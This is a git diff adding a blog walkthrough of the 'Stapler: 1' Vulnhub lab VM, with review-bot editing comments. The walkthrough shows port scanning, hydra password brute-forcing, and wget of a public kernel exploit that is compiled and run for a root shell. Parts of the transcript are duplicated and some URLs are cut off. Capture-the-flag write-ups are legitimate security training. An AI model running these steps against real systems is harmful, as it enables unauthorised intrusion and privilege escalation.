19
+Jun/2016
+writeup
+diff --git a/_posts/2016-06-19-stapler_walkthough.md b/_posts/2016-06-19-stapler_walkthough.md new file mode 100644 index 0000000..636726d --- /dev/null +++ b/_posts/2016-06-19-stapler_walkthough.md 
@@ -0,0 +1,291 @@ +--- +title: "Stapler: 1 Vulnhub Walkthrough" +layout: post +category: writeup +tags: [vulnhub, hacking] +excerpt: "Walkthrough for Stapler: 1 VM on Vulnhub" +--- + +# Figure out the IP + +``` +paul@archyoga [05:31:55] [~] +-> % nmap -sn 192.168.1.0/24 + +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT +. +. +. +Nmap scan report for red (192.168.1.135) +Host is up (0.0030s latency). +. +. +. +Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds +``` + +Let's see what's there: + +``` +paul@archyoga [05:33:59] [~] +-> % nmap -Pn 192.168.1.135 + +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT +Nmap scan report for red (192.168.1.135) +Host is up (0.011s latency). +Not shown: 992 filtered ports +PORT STATE SERVICE +20/tcp closed ftp-data +21/tcp open ftp +22/tcp open ssh +53/tcp open domain +80/tcp open http +139/tcp open netbios-ssn +666/tcp open doom +3306/tcp open mysql + +Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds +``` + +# Login to ftp + +``` +paul@archyoga [05:34:57] [~] +-> % ftp +ftp> open 192.168.1.135 +Connected to 192.168.1.135. +220- +220-|-----------------------------------------------------------------------------------------| +220-| Harry, make sure to update the banner when you get a chance to show who has access here | +220-|-----------------------------------------------------------------------------------------| +220- +220 +Name (192.168.1.135:paul): anonymous +331 Please specify the password. +Password: +230 Login successful. +Remote system type is UNIX. +Using binary mode to transfer files. +ftp> ls +200 PORT command successful. Consider using PASV. +150 Here comes the directory listing. +-rw-r--r-- 1 0 0 107 Jun 03 23:06 note +226 Directory send OK. +ftp> get note +200 PORT command successful. Consider using PASV. +150 Opening BINARY mode data connection for note (107 bytes). +226 Transfer complete. 
+107 bytes received in 5.1e-05 seconds (2 Mbytes/s) +ftp> 221 Goodbye. + +paul@archyoga [05:36:17] [~] +-> % cat note +Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. +``` + +Turns out it is, and inside is a file named ```note``` which names an ftp user: ```elly```. +I used hydra to test some common passwords and that worked out: + +``` +paul@archyoga [05:39:21] [~] +-> % hydra -l elly -e nsr 92.168.1.135 ftp +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. + +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36 +[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... +[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task +[DATA] attacking service ftp on port 21 +[21][ftp] host: 192.168.1.135 login: elly password: ylle +1 of 1 target successfully completed, 1 valid password found +Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50 +``` + +Now we can login to ftp as elly using the password ```ylle```. On the ftp server there's a passwd file, so I can use that as a user list to test against: + +``` +paul@archyoga [05:42:07] [~] +-> % ftp +ftp> open 192.168.1.135 +Connected to 192.168.1.135. +220- +220-|-----------------------------------------------------------------------------------------| +220-| Harry, make sure to update the banner when you get a chance to show who has access here | +220-|-----------------------------------------------------------------------------------------| +220- +220 +Name (192.168.1.135:paul): elly +331 Please specify the password. +Password: +230 Login successful. +Remote system type is UNIX. +Using binary mode to transfer files. +ftp> ls +200 PORT command successful. Consider using PASV. +150 Here comes the directory listing. +. +. +. 
+-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd +. +. +. +ftp> get passwd +200 PORT command successful. Consider using PASV. +150 Opening BINARY mode data connection for passwd (2908 bytes). +226 Transfer complete. +2908 bytes received in 9.9e-05 seconds (28 Mbytes/s) +ftp> 221 Goodbye. +``` + +# Login over ssh & exploit + +Using hydra again I discovered a login for ssh from the passwd file: + +``` +paul@archyoga [05:42:36] [~] +-> % awk -F':' '{ print $1}' passwd > users + + +-> % hydra -e nsr -L ./users 192.168.1.135 ssh +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. + +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42 +[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 +[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task +[DATA] attacking service ssh on port 22 +[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett +``` + +Then once I determined the release I went over to [http://exploit-db.com](http://exploit-db.com) and searched "ubuntu 16.04" and found this: https://www.exploit-db.com/exploits/39772/ + +Now for the exploit: + +``` +paul@archyoga [05:50:44] [~] +-> % ssh SHayslett@192.168.1.135 +----------------------------------------------------------------- +~ Barry, don't forget to put a message here ~ +----------------------------------------------------------------- +SHayslett@192.168.1.135's password: +Welcome back! + + +SHayslett@red:~$ lsb_release -a +No LSB modules are available. 
+Distributor ID: Ubuntu +Description: Ubuntu 16.04 LTS +Release: 16.04 +Codename: xenial +SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip +--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip +Resolving github.com (github.com)... 192.30.252.130 +Connecting to github.com (github.com)|192.30.252.130|:443... connected. +HTTP request sent, awaiting response... 302 Found +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following] +--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7115 (6.9K) [application/zip] +Saving to: ‘39772.zip’ + +39772.zip 100%[=====================================================================================================================================================================================================>] 6.95K --.-KB/s in 0s + +2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115] + +SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo +--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi +Resolving github.com (github.com)... 192.30.252.128 +Connecting to github.com (github.com)|192.30.252.128|:443... connected. +HTTP request sent, awaiting response... 
302 Found +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3 +--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7115 (6.9K) [application/zip] +Saving to: ‘39772.zip’ + +39772.zip 100%[======================= + +2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115] + +SHayslett@red:~/tmp$ unzip * +Archive: 39772.zip + creating: 39772/ +. +. +. +SHayslett@red:~/tmp$ cd *2 +SHayslett@red:~/tmp/39772$ ls +crasher.tar exploit.tar +SHayslett@red:~/tmp/39772$ tar xf exploit.tar +SHayslett@red:~/tmp/39772$ ls +crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar +SHayslett@red:~/tmp/39772$ cd e* +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput.c hello.c suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh +doubleput.c: In function ‘make_setuid’: +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .insns = (__aligned_u64) insns, + ^ +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .license = (__aligned_u64)"" + ^ +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput +starting writev +woohoo, got pointer reuse +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. +suid file detected, launching rootshell... +we have root privs now... 
+root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root +SHayslett@red:~/tmp/39772$ cd e* +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput.c hello.c suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh +doubleput.c: In function ‘make_setuid’: +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .insns = (__aligned_u64) insns, + ^ +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .license = (__aligned_u64)"" + ^ +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput +starting writev +woohoo, got pointer reuse +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. +suid file detected, launching rootshell... +we have root privs now... +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# +``` + +This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/. + +Next, the flag! + +``` +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root +root@red:/root# ls +fix-wordpress.sh flag.txt issue python.sh wordpress.sql +root@red:/root# cat flag.txt +~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ + .-'''''-. + |'-----'| + |-.....-| + | | + | | + _,._ | | + __.o` o`"-. | | + .-O o `"-.o O )_,._ | | +( o O o )--.-"`O o"-.`'-----'` + '--------' ( o O o) + `----------` +b6b545dc11b7a270f4bad23432190c75162c4a2b +``` + +Woo! diff --git a/_site/category/index.html b/_site/category/index.html index 8ebaae9..3905a06 100644 --- a/_site/category/index.html +++ b/_site/category/index.html @@ -122,7 +122,7 @@
19
+Jun/2016
+writeup
+14
diff --git a/_site/index.html b/_site/index.html index 91e7629..b477c4e 100644 --- a/_site/index.html +++ b/_site/index.html @@ -120,6 +120,32 @@ +19
+Jun/2016
+writeup
+14
diff --git a/_site/sitemap.txt b/_site/sitemap.txt index 92f05eb..d7d8f5d 100644 --- a/_site/sitemap.txt +++ b/_site/sitemap.txt @@ -1,3 +1,4 @@ +http://paul.walko.org//writeup/stapler_walkthough http://paul.walko.org//writeup/nebula_exploit_exercises diff --git a/_site/sitemap.xml b/_site/sitemap.xml index c094d4e..16abb4f 100644 --- a/_site/sitemap.xml +++ b/_site/sitemap.xml @@ -4,9 +4,15 @@ xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"> +19
+Jun/2016
+writeup
+14
@@ -336,6 +374,68 @@ +
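Review bot: In the `_posts/2016-06-19-stapler_walkthough.md` hunk, the first hydra command targets `92.168.1.135` while its own result line reports `host: 192.168.1.135`, so the pasted command lost its leading `1` and would not have reached the box as shown; correct it to `hydra -l elly -e nsr 192.168.1.135 ftp`. Two smaller issues in the same hunk: the privilege-escalation transcript is duplicated (the `wget` of `39772.zip` appears twice, and the whole `cd e*` / `./compile.sh` / `./doubleput` sequence is repeated after the first `cd /root`), and the sentence "Turns out it is, and inside is a file named note" refers to a check that is never stated, presumably that anonymous FTP login is permitted, so say that explicitly. The sentence "Then once I determined the release" also comes before the `lsb_release -a` output that determines it; move it after the transcript or reference it there. Finally, the file name drops the "r" in "walkthrough" (`stapler_walkthough.md`), and since the slug becomes the permalink it is easier to rename now than after the post is published.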
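Review bot: In the `_site/sitemap.txt` hunk, both entries carry a doubled slash (`http://paul.walko.org//writeup/...`), which indicates the site URL and path are being joined with an extra `/` in the site configuration rather than a problem with this post, and the new entry also inherits the misspelled slug `stapler_walkthough`. Fix the join in the configuration and the file name in `_posts/` once; the `_site/` tree is generated output and will pick up both corrections on the next build.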